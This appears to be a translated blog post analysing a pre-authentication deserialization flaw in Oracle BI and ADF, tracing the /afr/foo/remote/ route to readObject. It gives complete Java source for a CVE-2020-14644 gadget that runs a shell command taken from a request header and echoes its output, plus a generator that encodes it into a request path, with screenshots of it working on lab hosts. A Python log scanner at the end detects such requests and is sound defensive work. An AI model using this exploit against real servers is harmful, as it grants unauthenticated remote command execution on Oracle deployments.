Warning
This post was last updated on 2022-06-29; its contents may be out of date.
Install Oracle 19c. At this step of the installer, select AL32UTF8.
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/fa71075d-a611-831b-3c81-74f4fc35b44a.png)
Next the installer will appear to hang at 42%; just wait a while and it continues.
Install fmw_12.2.1.3.0_infrastructure.jar, clicking Next through the wizard.
Then install BI from fmw_12.2.1.4.0_bi_windows64_Disk1, again clicking Next through the wizard.
Then run rcu.bat
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/f4be72f5-1b75-3b3e-0271-7907bd3ad523.png)
After creating the database schemas BI uses, run C:\Oracle\Middleware\Oracle_Home\bi\bin\config.cmd to configure BI.
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/16700886-c082-da03-aa90-e1d2347b3343.png)
Installation is then complete.
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/528b03dc-3f46-d9e1-a79d-f405bbea2aed.png)
Edit line 338 of C:\Oracle\Middleware\Oracle_Home\user_projects\domains\bi\bin\setDomainEnv.cmd
Then restart the Oracle BI services; the server will listen for the debugger on port 8453.
In C:\Oracle\Middleware\Oracle_Home\user_projects\domains\bi\servers\AdminServer\tmp_WL_user\em\fw8wi5\war\WEB-INF\web.xml, em corresponds to the Oracle BI management console at http://172.16.16.132:9500/em/.
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/c3e98c75-70e3-d367-ff9d-3119367c4415.png)
web.xml defines several servlet mappings.
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/b4463339-c4aa-594f-f430-c7e5102bb1de.png)
In org.apache.myfaces.trinidad.webapp.ResourceServlet#doGet
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/f9004bc3-523f-4564-06d9-de55b83f535b.png)
the matching ResourceLoader and resourcePath are obtained from the request.
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/4616b493-d0ac-83cb-01a5-f7206da1574c.png)
_getResourceLoader maintains a ConcurrentMap holding the mapping from servletPath to loader.
oracle.adfinternal.view.resource.rich.RenderKitResourceLoader registers the corresponding entries in that map.
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/a3063aaf-935d-fe2b-46e6-4c8e537fe586.png)
When the route is /em/afr/foo/remote/payload, RemoteApplicationResourceLoader is selected as the loader in doGet, and its oracle.adfinternal.view.resource.rich.RemoteApplicationResourceLoader#findResource method is called.
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/aed591b2-3539-e2ba-49a9-4b19eebc01cc.png)
It returns a URL with the custom protocol remote, handled by the protocol handler RAStreamHandler.
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/b76fc718-5387-9501-d527-94bbadc69233.png)
RAStreamHandler's openConnection returns an RAURLConnection instance, and in its constructor
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/b6574f04-4bf3-832a-d45e-7e254f73be00.png)
_getPathBean is called,
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/216ad479-5dad-520c-9844-34474aa8c5f1.png)
which takes the path up to the first /
and then enters oracle.adfinternal.view.rich.remote.resources.URLEncoderPathBean#getInstanceFromString.
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/15a6eaaa-6f14-55ff-3d18-0067d928c907.png)
Following the calls down, this ends in readObject.
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/42d875df-cf78-1eca-23ff-63e5be6fdf33.png)
This shows that a request of the form /em/afr/foo/remote/{encoded payload}/ reaches deserialization.
The gadget can be CVE-2020-14644; the payload is given here.
Command execution with the output echoed back in the response
```java
package com.tangosol.internal.util.invoke.lambda;

import com.tangosol.internal.util.invoke.AbstractRemotable;

// The class name suffix must match the hash the target version computes
// for LambdaIdentity (see the note on ClassIdentity below).
public class LambdaIdentity$E12ECA49F06D0401A9D406B2DCC7463A extends AbstractRemotable {
    public LambdaIdentity$E12ECA49F06D0401A9D406B2DCC7463A() {
        try {
            // Reach the current request/response through the WebLogic work adapter
            weblogic.work.WorkAdapter adapter = ((weblogic.work.ExecuteThread) Thread.currentThread()).getCurrentWork();
            java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");
            field.setAccessible(true);
            Object obj = field.get(adapter);
            weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) obj.getClass().getMethod("getServletRequest").invoke(obj);
            weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl) obj.getClass().getMethod("getServletResponse").invoke(obj);
            String cmd = req.getHeader("cmd");
            if (cmd != null && !cmd.isEmpty()) {
                Process exec;
                if (System.getProperty("os.name").toLowerCase().contains("win")) {
                    exec = Runtime.getRuntime().exec(new String[]{"cmd", "/c", cmd});
                } else {
                    exec = Runtime.getRuntime().exec(new String[]{"sh", "-c", cmd});
                }
                res.getServletOutputStream().clearBuffer();
                res.getServletOutputStream().writeStream(exec.getInputStream());
                res.getServletOutputStream().flush();
                res.getServletOutputStream().close();
                res.flushBuffer();
            }
        } catch (Exception var1) {
            var1.printStackTrace();
        }
    }
}
```
Generating the payload
```java
package com.example.miracle;

import com.tangosol.internal.util.invoke.ClassDefinition;
import com.tangosol.internal.util.invoke.ClassIdentity;
import com.tangosol.internal.util.invoke.RemoteConstructor;
import com.tangosol.internal.util.invoke.lambda.LambdaIdentity;
import oracle.adf.view.rich.util.SerializationUtils;
import java.nio.file.Files;
import java.nio.file.Paths;

public class Main {
    public static void main(String[] args) throws Exception {
        RemoteConstructor remoteConstructor = new RemoteConstructor(
                new ClassDefinition(
                        new ClassIdentity(LambdaIdentity.class),
                        Files.readAllBytes(Paths.get("E:\\tools\\code\\Miracle\\target\\classes\\com\\tangosol\\internal\\util\\invoke\\lambda\\LambdaIdentity$E12ECA49F06D0401A9D406B2DCC7463A.class"))),
                new Object[]{}
        );
        // Encode the object the same way the remote resource path expects it
        String s = SerializationUtils.toURLEncodedString(remoteConstructor);
        System.out.println(s);
    }
}
```
Screenshots of the echo reproduction
http://172.16.16.132:9500/em/afr/foo/remote/
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/6fa86ef0-4bc9-b486-cc6d-49a63d6d319c.png)
http://172.16.16.132:9502/bicomposer/afr/foo/remote/
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/c51525d5-f8bd-ee8d-27bb-deae161e5d85.png)
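A defender-side counterpart to the route traced above: a small scanner over web access logs that flags requests to the `afr/foo/remote/<segment>/` route under both contexts seen here (`em` on 9500 and `bicomposer` on 9502) when the segment is long enough to be an encoded object rather than a resource name. This is an added example, not code from the original post; the log lines are constructed, and the 64-character threshold is an assumption to tune per deployment.

```python
import re
from typing import Iterable, Iterator, NamedTuple

# Route from the analysis above: /<context>/afr/foo/remote/<payload>/
ROUTE_RE = re.compile(r'^/(?P<ctx>[^/]+)/afr/foo/remote/(?P<seg>[^/?\s]+)')

# Combined-log-format request line (assumed layout, as in the constructed samples)
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Assumption: a real resource name under afr/ is short; an encoded serialized
# object is not. Adjust after baselining legitimate traffic.
MIN_SUSPICIOUS_LEN = 64


class Hit(NamedTuple):
    ip: str
    ts: str
    context: str
    status: str
    seg_len: int


def scan(lines: Iterable[str]) -> Iterator[Hit]:
    """Yield one Hit per request that reaches the remote-resource route
    with a suspiciously long path segment, regardless of HTTP status
    (a 500 can still mean the deserialization ran)."""
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        r = ROUTE_RE.match(m['path'])
        if not r:
            continue
        seg = r['seg']
        if len(seg) >= MIN_SUSPICIOUS_LEN:
            yield Hit(m['ip'], m['ts'], r['ctx'], m['status'], len(seg))


# Constructed sample log lines; 'A'*120 and 'B'*96 stand in for encoded blobs.
SAMPLE_LOG = [
    '10.0.0.5 - - [29/Jun/2022:10:00:01 +0800] "GET /em/afr/partition/n/default/page.js HTTP/1.1" 200 5120',
    '10.0.0.5 - - [29/Jun/2022:10:00:02 +0800] "GET /em/afr/foo/remote/small/ HTTP/1.1" 404 0',
    '10.0.0.9 - - [29/Jun/2022:10:00:03 +0800] "GET /em/afr/foo/remote/' + 'A' * 120 + '/ HTTP/1.1" 500 0',
    '10.0.0.9 - - [29/Jun/2022:10:00:04 +0800] "GET /bicomposer/afr/foo/remote/' + 'B' * 96 + '/ HTTP/1.1" 200 42',
]

if __name__ == '__main__':
    for hit in scan(SAMPLE_LOG):
        print(hit)
```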
On 10.3.6, peterjson and jang used ReflectionExtractor wrapped around nested RemoteInvocation objects and then called ShellSession.eval to get RCE. Noting it here without going deeper; it is a combination of several CVEs.
When firing the PoC, the name of the echo class must match the target version exactly. For details see kingkk's 《CVE-2020-14644分析与gadget的一些思考》.
The relevant spot is com.tangosol.internal.util.invoke.ClassIdentity#ClassIdentity(java.lang.Class<?>)
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/b8fffa5e-7031-375d-364d-38df91da3d33.png)
- https://peterjson.medium.com/miracle-one-vulnerability-to-rule-them-all-c3aed9edeea2
- https://testbnull.medium.com/oracle-access-manager-pre-auth-rce-cve-2021-35587-analysis-1302a4542316
My writing is poor, the wording careless, the content shallow and the hands-on work clumsy. Corrections and pointers from more experienced readers are very welcome; many thanks.